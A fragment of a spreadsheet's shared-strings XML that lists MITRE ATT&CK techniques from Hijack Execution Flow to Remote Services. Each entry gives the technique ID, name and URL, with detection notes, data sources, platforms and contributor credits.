    <t>T1574.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1574.009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1574.010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services Registry Permissions Weakness</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Office 365, Windows, macOS</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1562.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Cloud Service Disable, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Ibrahim Ali Khan; Janantha Marasinghe; Matt Snyder, VMware; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee</t>
  </si>
  <si>
    <t>T1562.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>T1562.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Firewall: Firewall Disable, Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>Expel</t>
  </si>
  <si>
    <t>T1562.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Tools</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Gal Singer, @galsinger29, Team Nautilus Aqua Security; Nathaniel Quist, Palo Alto Networks; Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1562.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/003</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</si>
  <si>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</si>
  <si>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Emile Kenning, Sophos; Vikas Singh, Sophos</t>
  </si>
  <si>
    <t>Host forensic analysis, Log analysis</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Impair Defenses: Indicator Blocking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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/006</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Rob Smith</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>T1525</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Containers, IaaS</t>
  </si>
  <si>
    <t>Image: Image Creation, Image: Image Modification</t>
  </si>
  <si>
    <t>Praetorian; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal on Host</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Brad Geesaman, @bradgeesaman; Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Indicator Removal on Host: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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Indicator Removal on Host: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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1070.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Anti Virus, Host Intrusion Prevention Systems, Log Analysis</t>
  </si>
  <si>
    <t>T1070.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Deletion</t>
  </si>
  <si>
    <t>Walker Johnson</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Indicator Removal on Host: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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1070.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>Romain Dumont, ESET</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>Indirect Command Execution</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application control by file name or path, Static File Analysis</t>
  </si>
  <si>
    <t>T1105</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1105</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</si>
  <si>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</si>
  <si>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File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>Inhibit System Recovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Yonatan Gotlib, Deep Instinct</t>
  </si>
  <si>
    <t>T1056</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Collection, Credential Access</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</si>
  <si>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</si>
  <si>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Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1056.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056/002</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</si>
  <si>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</si>
  <si>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Process: Process Creation</t>
  </si>
  <si>
    <t>Matthew Molyett, @s1air, Cisco Talos</t>
  </si>
  <si>
    <t>T1056.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>Inter-Process Communication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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559</t>
  </si>
  <si>
    <t>Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.</t>
  </si>
  <si>
    <t>Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1559.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1559.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1559/002</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</si>
  <si>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</si>
  <si>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T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC); Tim MalcomVetter</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1570</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Metadata, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Man in the Browser</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1185</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</si>
  <si>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</si>
  <si>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Logon Session: Logon Session Creation, Process: Process Access</t>
  </si>
  <si>
    <t>Justin Warner, ICEBRG</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Man-in-the-Middle</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Man-in-the-Middle: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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1557/002</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</si>
  <si>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</si>
  <si>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Jon Sternstein, Stern Security</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>Man-in-the-Middle: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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Elastic; Felipe Espósito, @Pr0teus; Nick Carr, FireEye; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>Application control by file name or path</t>
  </si>
  <si>
    <t>T1036.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>File: File Metadata</t>
  </si>
  <si>
    <t>T1036.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux, Windows</t>
  </si>
  <si>
    <t>Command: Command Execution, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1036.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Metadata, Image: Image Metadata, Process: Process Metadata</t>
  </si>
  <si>
    <t>Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1036.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1036.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1556</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Credential Access, Defense Evasion, Persistence</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</si>
  <si>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</si>
  <si>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Creation, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load, Process: OS API Execution, Process: Process Access, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Chris Ross @xorrior</t>
  </si>
  <si>
    <t>T1556.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1556.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1556.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1556.003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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Modification, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>George Allen, VMware Carbon Black; Scott Knight, @sdotknight, VMware Carbon Black</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1578.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Instance: Instance Creation</t>
  </si>
  <si>
    <t>T1578.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1578.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1578.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Modification, Instance: Instance Start, Instance: Instance Stop</t>
  </si>
  <si>
    <t>Netskope</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Bartosz Jerzman; David Lu, Tripwire; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1601</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1601.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1601.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1106</t>
  </si>
  <si>
    <t>Native API</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1106</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</si>
  <si>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</si>
  <si>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Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Router ACL</t>
  </si>
  <si>
    <t>T1599.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Network Denial of Service: Direct Network Flood</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1498.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1046</t>
  </si>
  <si>
    <t>Network Service Scanning</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1046</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</si>
  <si>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</si>
  <si>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Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1040</t>
  </si>
  <si>
    <t>Network Sniffing</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>Credential Access, Discovery</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</si>
  <si>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</si>
  <si>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T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ryan Becwar</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ed Williams, Trustwave, SpiderLabs; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1003.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1003.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>T1003.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>ExtraHop; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1003.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1003.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1003.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>T1003.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1003.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1027</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Command: Command Execution, File: File Content, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Red Canary</t>
  </si>
  <si>
    <t>Application control, Application control by file name or path, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Content, File: File Metadata</t>
  </si>
  <si>
    <t>Martin Jirkal, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Praetorian; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Anti-virus, Binary Analysis, Host intrusion prevention systems, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>T1027.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1027.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1027.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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are other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t>File: File Content</t>
  </si>
  <si>
    <t>T1588</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1588.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1588.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1588.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1588.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1588.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1588.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1137</t>
  </si>
  <si>
    <t>Office Application Startup</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Loic Jaquemet; Microsoft Threat Intelligence Center (MSTIC); Nick Carr, FireEye; Praetorian; Ricardo Dias; Sahar Shukrun</t>
  </si>
  <si>
    <t>T1137.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1137.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1137.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1137.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1201</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</si>
  <si>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</si>
  <si>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Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1069.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1069.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1566</t>
  </si>
  <si>
    <t>Phishing</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1598</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1598.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1598.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1598.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1566.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1566.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/002</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</si>
  <si>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</si>
  <si>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Mark Wee; Philip Winther; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>T1566.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1542</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Linux, Network, Windows</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>T1542.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Drive: Drive Modification</t>
  </si>
  <si>
    <t>T1542.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1542.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1542.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1542.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055</t>
  </si>
  <si>
    <t>Process Injection</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Anastasios Pingios; Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>T1055.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1055.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Module: Module Load, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1055.011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055.009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055.013</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.012</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055.008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1055.014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1090</t>
  </si>
  <si>
    <t>Proxy</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Brian Prange; Heather Linn; Walker Johnson</t>
  </si>
  <si>
    <t>T1090.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1090.002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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1090.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1090.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1012</t>
  </si>
  <si>
    <t>Query Registry</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1563.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Anastasios Pingios</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
